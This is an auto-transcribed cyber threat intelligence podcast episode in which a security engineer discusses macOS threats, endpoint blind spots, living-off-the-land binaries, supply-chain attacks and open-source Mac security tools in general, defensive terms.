Welcome And Guest Intro

Olivia Gallucci 0:00

MacOS Targeted Malware has been on the rise.

Rachael Tyrell 0:03

Hello and welcome to episode two, season two of your Cyber Threat Intelligence podcast. Whether you're a seasoned CTI expert, a cybersecurity professional, or simply curious about the digital battlefield, our expert guests and hosts will break down complex topics into actionable insights. On this episode of season two, our host Pedro Kurtzman will chat with Olivia Gallucci, who is a security engineer with deep expertise in macOS internals, reverse engineering, and user space research. Olivia has presented at multiple conferences such as Black Hat, DEF CON, and several security B sides, just to name a few. Olivia is also recipient of multiple awards, including from women in cybersecurity, and she is always bringing important awareness related to the security of macOS operating systems to a broader audience. Over to you, Pedro.

Pedro Kertzman 0:54

Olivia, thank you so much for coming to the show. I'm really happy to have you here. Thank you so much for having me. I appreciate it. So today we're gonna deep dive on the cyber part of CTI, and we're gonna talk about macOS, which is probably one of my favorite ones. Olivia, do you think we are past that fairy tale about Macs are secure by default, don't need security? What is your thoughts around that fairy tale?

The Mac Security Myth Debunked

Olivia Gallucci 1:23

Yeah, the idea that Macs are secure by default, I think is increasingly regarded as a myth. Weirdly, I still do see it occasionally, especially among uh developers and consumers, but within IT and security engineers, it's usually regarded as a joke. In recent years, macOS has faced a surge of issues, and I think amongst the security community, it it has ended up really dispelling that notion that built-in protections alone can keep consumers or enterprises safe. In general, uh, I think treating macOS or any system as inherently safe can lead to like a lot of blind spots. And my my personal advice would be to monitor Apple like all Apple OS's the same as you would any other OS, like a Linux, a Windows, or Android.

Pedro Kertzman 2:10

That's that's a great advice, thank you. And how you know your story with macOS came to be? How you you know bumped into that probably in the past?

Olivia Gallucci 2:22

Yeah, so I when I was in high school, I switched schools and I went to a school that had a robotics program, and I got really into programming and open source software because the open source community would help me like do so much stuff despite not being related to what their their goals were. I was like, hey, I have this bug, can someone help me fix it? And they were like, sure. And I was really touched by this open source community, and then I'd watch this documentary on the anonymous hacker group, and I was like, okay, like I want to do open source offensive security. I began writing opinion pieces and blogs and stuff online about, you know, the open source software community and Debian and various other open source operating systems. And at some point, I had really gotten passionate about pointing out some of the claims Apple was making and how things weren't really aligned up. And so I was I was quite critical of Apple. And one of the red team managers there reached out to me and was like, Hey, at Apple, we appreciate think different. I'd love, I'd love for you to come work here. And during that interview process, I found a vulnerability like literally during the interview process. Holy. And that um that really went well. So that was kind of how I got into the Mac space, but before that, I hadn't touched a Mac in like seven years. And so I just I had a really great, I started off as an intern there and I had a really great experience there. So that's amazing. That's how it goes.

Pedro Kertzman 3:53

That's amazing. Imagine how many points you get to find a vulnerability during the interview process, right? That's quite unique. That's nice. Yeah, from an endpoint visibility standpoint. What are the things that, for example, you can't see on the macOS, like uh blind spots, any anything around that? Macs work differently, Apple provide gazillion APIs for security or any other vendors to hook into you. Any thoughts around best practices on that side of things?

Olivia’s Path Into macOS Security

Olivia Gallucci 4:26

Yeah, so Mac and Apple and and all of its OS have kind of had this strange history because at different points in times there's been things obfuscated or things hidden, and then things also open source. Like Apple has over like 400 open source repositories available on GitHub. And it kind of shifts the conversation to you know what system you're talking about and then what timeline. So today, macOS imposes certain restrictions that, yes, create blind spots and endpoint monitoring. So, one example of this would be like Apple's unified logging system. It's off-limit to third-party security tools without special entitlements, meaning that like EDRs or AVs or any sort of endpoint security tool cannot read system logs for standard threat telemetry in a super easy and accessible way. However, it's not just endpoint monitoring that's effective. Even just like the standard red team engineer or researcher might have problems day-to-day if they don't have a dedicated test machine. Like Apple's uh system integrity protection prevents techniques like user mode hooking of processes. And as a result, you know, legacy endpoint solutions that relied on injecting code into running apps are now, you know, foiled. Today as well, Apple provides something known as the endpoint security API for authorized monitoring. This is an awesome solution, but not all system activity is exposed through it. And combined, these limitations plus Apple's strict like APIs mean that some malicious behaviors or system changes on macOS might go unseen by security software in contrast to the deep visibility that I guess other OSs provide and have normalized like Windows and Linux.

Pedro Kertzman 6:12

And uh, let's say, again, comparing those different operating systems and how security-wise people can help protect them. One common example these days is like living off the land techniques or low bring your own binaries or any living off-the-land related techniques on on the other OSs. Is that also a thing on Mac OS or how's that working on that particular scenario?

Endpoint Blind Spots On macOS

Olivia Gallucci 6:42

Yeah, so we have the like living off the land attacks on Mac, which is essentially just allowing legit system binaries to execute malicious tasks. Within the Apple security community, I think they're called Lubins or Living Off the Orchard binaries. And like there's a standard like list somewhere, it's like it's like over like 30 built-in macOS binaries, and scripts have been to be like exploitable for Yikes purposes. Um, like common examples of this include Asa Script, which is the command line tool used to run Apple Script and JavaScript for automation, and people will use this to execute malicious scripts, or and then there's curl, which I think is available everywhere to you know to download payloads instead of like dropping obvious malware files. So, you know, by using these native tools, like Apple provided apps like Bash, Launch CTL, AustaScript, et cetera, these attacks blend in normal system activity and can bypass certain security filters. And such low-bin tactics have been observed at multiple stages of Mac attacks from the initial infection, like using crawl or AstaScript in a macro or one-linered command, to the post-compromise actions using admin tools like DSCL for reconnaissance. I guess the the the TLDR is that you know, Mac, like all OSs, kind of has its own group of pre-installed binaries that attackers can repurpose. And this can also make detections a little bit harder because the tools being used are actually legitimate programs. That said, you know, it's always good to use the tools that you know Mac and Apple makes available, you know, using Apple's official security frameworks to the fullest extent while acknowledging that there might be some blind spots because of these attacks.

Pedro Kertzman 8:26

No, that's that's awesome. It's pretty much like you say a Windows operating system, PowerShare. We kind of block the application, right? But you have to understand the behavior, the commands, and how you name it, the user or applications are leveraging that underlying technology on the on the OS itself. It makes total sense. Thank you. And and the other uh, you know, other than living off the land, the other super common or fairly common scenario these days, it's attacks that the as an industry will recognize as supply chain attacks. Is that also a thing in the macOS reality?

Olivia Gallucci 9:06

100%. And I think there's largely like two groups of supply chain attacks on Mac. So there's the developer and software supply chain side, and then there's the user-facing vectors in like the trust chain. To go into that first part, the macOS ecosystem has seen supply tax targeting software developers and the the common softwares that they rely on. I remember in 2024, there was a pretty serious vulnerability. There might have been multiple, and a it's a package manager called CocoPods. It raised the alarms because attackers could inject malicious code into iOS and macOS apps by hijacking third-party dependencies. Also, people have like actively planted malware in development tools and libraries. Like one one campaign in 2025 poisoned a Python package to pull a macOS version of Coldball Strike. And this effectively compromised Macs through a seemingly legit like open source component. And as a as a group, these scenarios kind of show how attackers exploit that trust that developers place in frameworks and packages. To get into that second group, there's those user-facing areas. Here, the end users are also targeted via like macro malware and trojanized apps. So Macs are not you know immune to social engineering. Office macros remain a threat on Mac. So like Microsoft Office or Mac supports VBA macros, just like on Windows. So an unsuspecting user who enables macros in malicious, like in a malicious document, can execute malware on Mac OS. Attackers have also distributed trojanized apps and fake updates to Mac users. For example, like a malicious DMG installer masquerading as a cracked or popular app can deliver malware. This became super popular with info stealers like uh Amos. Like that's one of the main techniques that they use. And then compounding on this issue, you know, Apple's own code signing and app notarization mechanisms, while adding really great security, are they're not foolproof. There's there's been instances of Apple notarized malware slipping through automated checks, meaning that malware might arrive digitally signed and notarized by Apple on your machine. Holy. So these this abuse shows that even a trusted signature or an Apple notary ticket doesn't guarantee safety. So to me, you know, macOS bases supply chain risks at multiple levels from that developer pipeline, like vulnerable package repositories and tamper tooling, to the end user like the malicious office docs, the trojanized installers, and even occasionally subverted code signing. Again, I think you know, being mindful and having verification at each step is best rather than relying on a seam to trust.

Living Off The Land On Mac

Pedro Kertzman 11:54

Yeah, I know 100%. And you touched on a very interesting point. I hear more and more. It's related to, let's say, secure by design principles, software dependencies, right? You touched on that. And if you don't check that as a developer or as a security protectioner, maybe you need to go reverse engineer things to the to find out what's the underlying dependencies that you're actually agreeing to use without knowing that just by running a software, it's so important because uh we usually find out or hear more about dependencies when some open source superused log4j example is used across the board that goes south, and then you see the industry is was basically entirely or for the most part relying on on things like that. If you think about macOS, the real like the reality of security for macOS versus the things we still have on the let's say marketing side. Any any thoughts around that?

Olivia Gallucci 13:00

Yeah, Apple has long promoted macOS as a secure platform, but with most things, the reality is more complex. Yes, in macOS benefits from strong security by design into the Unisbase architecture, the sandboxing, notarization requirements, and the many amazing features that Apple's built on top of uh plus many other things that were implemented in the ARM and the hardware and all that. Yet recent years have really proven that it is far from impervious. So, like macOS targeted malware has been on the rise like really sharply for the past two years. So 2024 and 2025 saw a noticeable uptick in macOS focused threats from the info sealer malware as a service to to nation state spyware. In fact, this is part of the reason why like my career kind of kicked off outside of Apple because a lot of people like didn't really understand why I was even focusing in this area. But when info sealers came along, they were like, oh, you know, maybe Mac Mac security like actually matters. Like uh and I attackers really recognized that the enterprises like they're starting to adapt Apple products, and they're becoming this like growing user base of Macs in these enterprise environments, and that that's a lot of money. So the old marketing notion that you know Macs don't get viruses has been, in my opinion, thoroughly debunked. But again, there's that lingering perception that persists among like the average consumers and some developers, and this misconception can can breed a false sense of security. In reality, I think uh mac OS now faces many of the same threats as other OSs. To give like two examples, like I'd say like ransomware groups. I remember like they a bunch of them started actually adopting their Windows and Linux payloads to Mac. And like 20 in 2022, I think it was, macOS malware was predicted to make up around like six percent of all infections in 2022. I think this is according to a company called Securionics. And every single time like I read a new article, it's like it's no longer six percent, it's like 13% or 15%. And it's just like that number has just been climbing like regardless of really where you look. And you know, I'd warn that over reliance on Apple's built-in protections like gatekeeper expertect and sandboxing is unwise because these measures can only catch some of the attacks due to most of them using social engineering, and hackers just continuously find ways around them. So the security marketing around macOS being virus-free or requiring no extra protection no longer holds true. And I think the person that is going to suffer the most from this will be the average consumer.

Pedro Kertzman 15:37

Yeah, no, that's that's a great point. I think also with that statistics of the increasing attacks and compromises, users probably changed back in the day. We mostly saw Macs on marketing or digital-related like roles. Now, like programmers, people with root access to other things, like more, let's say juicy admin rights for threat actors, and you name it, directors like C level. They always have their own Macs. Everybody has Windows, that guy has a Mac.

Supply Chain And Trust Failures

Olivia Gallucci 16:09

Yeah, uh a hundred percent. The users have definitely changed. Apple was seen as almost a status symbol for for many years, and I think to a degree today it still is. Like, I remember when I was in high school, and it was almost like a class differentiator of like who could afford a Mac versus like who had a Windows machine. Yeah, and there was a select like subset of kids who were like, I have a Linux machine, and some of these kids were kids who were like, Oh, I want my computer to run faster, but a lot of these kids were the kids that you would consider technical. And throughout college, I noticed like most people use Linux. A lot of the environments I was in were you know Linux heavy, especially for developers and all of that. And then I don't know what shifted, but something definitely did shift. I think maybe it was like the M1, the M2, like those that processing power, and I think AI and needing to have that processing power uh locally and wanting to have that that sleekness with it. I think it was something with that. That's not something that I could say back up with a study or anything like that. But I there was a hundred percent a user shift in today. A lot in developer environments I see now either mix all three of these operating systems or are Mac heavy. I've seen some companies be so Windows heavy, but those are usually ones in like finances or retail, uh professions that have been a little bit uh older than say the standard of like I'm gonna you know vibe code an app. Like most of those are I think are Mac heavy people.

Pedro Kertzman 17:52

Yeah, no, absolutely. I saw I saw another day like a little joke that guy was on an airplane coding, no internet, no AI support, no stack overflow, just coding like an animal from memory, right? There, like it's you know, it's and it was a Mac, right? So it's uh Wow, yeah, that surprises me.

Olivia Gallucci 18:13

That actually really surprises me. I feel like to to this day, still, like Linux users and they can beat me at anything, like they're like, Yeah, I have this like kernel module I put, and I'm like, that's amazing. Like, I wish I wish I knew what you were doing.

Pedro Kertzman 18:29

Yeah, current kernel is like serious stuff if you go down that path. It's interesting. Yeah, I admire can who can do that. But Olivia, any other thoughts, suggestions for people using Macs or planning to use Macs on the security side of things? Any thoughts around that?

Olivia Gallucci 18:51

Yeah, I think the best thing users can do is if if this is a macOS specific advice, there's an amazing open source software repository or software, I guess, account on GitHub called Objective C. And this account has all of these amazing security softwares, they're all open source, you can see what they're doing, and each one does a different thing. So one of them can tell you if an application is currently accessing or using your camera or microphone. One tactic that malware uses is it will change your volume or access your camera or microphone, and it will just tell you when that happens. Another one that's there will show you if someone has tried to like tamper with your machine where you weren't around. Like, I think it takes a picture of like the person who's like trying to log in. That's happening. Some of them will show you if like a new system extension has been added to your machine, and pretty much anyone can like benefit from having these extra security protections. I think the original intent was to help like journalists and stuff, but the the average malware now on Mac attacks these same things. So it's just a good extra safety protection and it's something that is accessible and easy for the average person to install and use. And make a shout out to Patrick Wardle for creating those tools and making Mac security accessible to the average user.

Pedro Kertzman 20:13

That's awesome. Olivia, thank you so much for all the insights. Really appreciate you coming to the show. And I hope I'll see you around. Thank you.

Olivia Gallucci 20:23

Of course. Thank you so much.

Rachael Tyrell 20:26

And that's a wrap. Thanks for tuning in. If you found this episode valuable, don't forget to subscribe, share, and leave a review. Got thoughts or questions? Connect with us on our LinkedIn group, Cyber Threat Intelligence Podcast. We'd love to hear from you. If you know anyone with CTI expertise that would like to be interviewed in the show, just let us know. Until next time, stay sharp and stay secure.